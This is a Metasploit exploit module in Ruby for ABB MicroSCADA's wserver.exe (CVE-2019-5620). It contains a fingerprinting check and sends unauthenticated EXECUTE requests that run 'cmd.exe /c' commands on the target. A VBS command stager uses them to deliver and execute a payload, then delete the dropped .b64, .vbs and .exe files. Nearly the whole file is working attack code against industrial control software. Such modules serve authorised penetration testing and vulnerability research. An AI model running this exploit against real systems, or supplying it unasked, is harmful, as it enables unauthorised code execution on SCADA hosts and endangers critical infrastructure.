Path: blob/master/modules/exploits/windows/scada/abb_wserver_exec.rb
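##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  # Operation name sent to wserver.exe; the trailing NUL is part of the
  # wire format, not a terminator added by Ruby.
  EXECUTE_OP = "EXECUTE\x00".freeze

  # Status word wserver.exe answers with when EXECUTE carries no command.
  # It is used only as a fingerprint by #check.
  EMPTY_EXECUTE_STATUS = 0xe10001

  # Status word returned when a command was accepted.
  EXECUTE_OK_STATUS = 1

  # Every reply this module understands is 6 bytes: a 16-bit length field
  # (which must itself read 6) followed by a 32-bit status word.
  REPLY_LENGTH = 6

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ABB MicroSCADA wserver.exe Remote Code Execution',
      'Description'    => %q{
        This module exploits a remote stack buffer overflow vulnerability in ABB MicroSCADA. The
        issue is due to the handling of unauthenticated EXECUTE operations on the wserver.exe
        component, which allows arbitrary commands. The component is disabled by default, but
        required when a project uses the SCIL function WORKSTATION_CALL.

        This module has been tested successfully on ABB MicroSCADA Pro SYS600 9.3 on
        Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Brian Gorenc', # Original discovery
          'juan vazquez'  # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2019-5620' ],
          [ 'OSVDB', '100324' ],
          [ 'ZDI', '13-270' ],
          [ 'URL', 'https://library.e.abb.com/public/41ccfa8ccd0431e6c1257c1200395574/ABB_SoftwareVulnerabilityHandlingAdvisory_ABB-VU-PSAC-1MRS235805.pdf' ]
        ],
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'DefaultOptions' =>
        {
          'WfsDelay' => 5
        },
      'Targets'        =>
        [
          [ 'ABB MicroSCADA Pro SYS600 9.3', { } ]
        ],
      'CmdStagerFlavor' => 'vbs',
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'DisclosureDate' => '2013-04-05'
    ))

    register_options([Opt::RPORT(12221)])
  end

  # Fingerprints the service by sending an EXECUTE with an empty command:
  # wserver.exe rejects it with a specific status word, so nothing is run on
  # the target during the check.
  #
  # Returns CheckCode::Vulnerable when that status is observed,
  # CheckCode::Unknown when the port cannot be reached or nothing is read
  # back (a timeout is not evidence of safety), and CheckCode::Safe for any
  # other reply.
  def check
    res = wserver_request(wserver_packet(EXECUTE_OP))
    return Exploit::CheckCode::Unknown if res.nil?

    if wserver_status(res) == EMPTY_EXECUTE_STATUS
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  rescue ::Rex::ConnectionError
    Exploit::CheckCode::Unknown
  end

  # Stages the payload one line at a time through #execute_command.
  # Lines are capped at 750 bytes because, per the original author's note,
  # anything longer triggers the overflow. :nodelete is set because the
  # stager's own cleanup is replaced by #execute_cmdstager_end.
  def exploit
    execute_cmdstager({ linemax: 750, nodelete: true })
  end

  # Callback the CmdStager mixin invokes once the stager has run. Because
  # the stager was started with :nodelete, the three files it left in the
  # temp directory -- the encoded payload (.b64), the VBS decoder (.vbs) and
  # the decoded executable (.exe) -- are removed here through the same
  # EXECUTE primitive. +opts+ is the stager's option hash and is unused.
  #
  # A delete that gets an unexpected reply aborts via fail_with inside
  # #execute_command, so any files after it in the list are left behind.
  def execute_cmdstager_end(opts)
    # NOTE(review): these read the stager's private state directly; if the
    # stager implementation renames its ivars this yields nil names and the
    # del commands silently target the wrong paths -- confirm against the
    # CmdStager mixin in use.
    @var_tempdir = @stager_instance.instance_variable_get(:@tempdir)
    @var_decoded = @stager_instance.instance_variable_get(:@var_decoded)
    @var_encoded = @stager_instance.instance_variable_get(:@var_encoded)
    @var_decoder = @stager_instance.instance_variable_get(:@var_decoder)

    [
      "#{@var_encoded}.b64",
      "#{@var_decoder}.vbs",
      "#{@var_decoded}.exe"
    ].each do |leftover|
      path = "#{@var_tempdir}#{leftover}"
      print_status("Trying to delete #{path}...")
      execute_command("del #{path}", {})
    end
  end

  # Runs +cmd+ on the target through the unauthenticated EXECUTE operation,
  # wrapped in "cmd.exe /c". Called by the CmdStager mixin for every stager
  # line and by #execute_cmdstager_end; +opts+ belongs to that calling
  # convention and is unused here.
  #
  # Raises (via fail_with, Failure::UnexpectedReply) unless the service
  # answers with the 6-byte acknowledgement carrying EXECUTE_OK_STATUS.
  def execute_command(cmd, opts)
    res = wserver_request(wserver_packet(EXECUTE_OP, "cmd.exe /c #{cmd}"))
    return if wserver_status(res) == EXECUTE_OK_STATUS

    fail_with(Failure::UnexpectedReply, 'Unexpected reply while executing the cmdstager')
  end

  private

  # Builds one request frame: a 4-byte little-endian total length (the
  # length field itself included, hence the +4), the operation name and the
  # argument bytes. The byte size is used rather than the character count so
  # the header stays correct if +arg+ ever contains non-ASCII text.
  def wserver_packet(op, arg = '')
    body = (op + arg).b
    [4 + body.bytesize].pack('V') + body
  end

  # Opens a connection, writes +pkt+ and returns the raw reply (nil when
  # nothing is read). The socket is always torn down, even when the write or
  # read raises, so a failed stager line does not leak a connection.
  def wserver_request(pkt)
    connect
    begin
      sock.put(pkt)
      sock.get_once
    ensure
      disconnect
    end
  end

  # Extracts the 32-bit status word from a reply, or nil when the reply is
  # missing, not REPLY_LENGTH bytes long, or its own length field disagrees.
  def wserver_status(res)
    return nil unless res && res.bytesize == REPLY_LENGTH

    length, status = res.unpack('vV')
    length == REPLY_LENGTH ? status : nil
  end
end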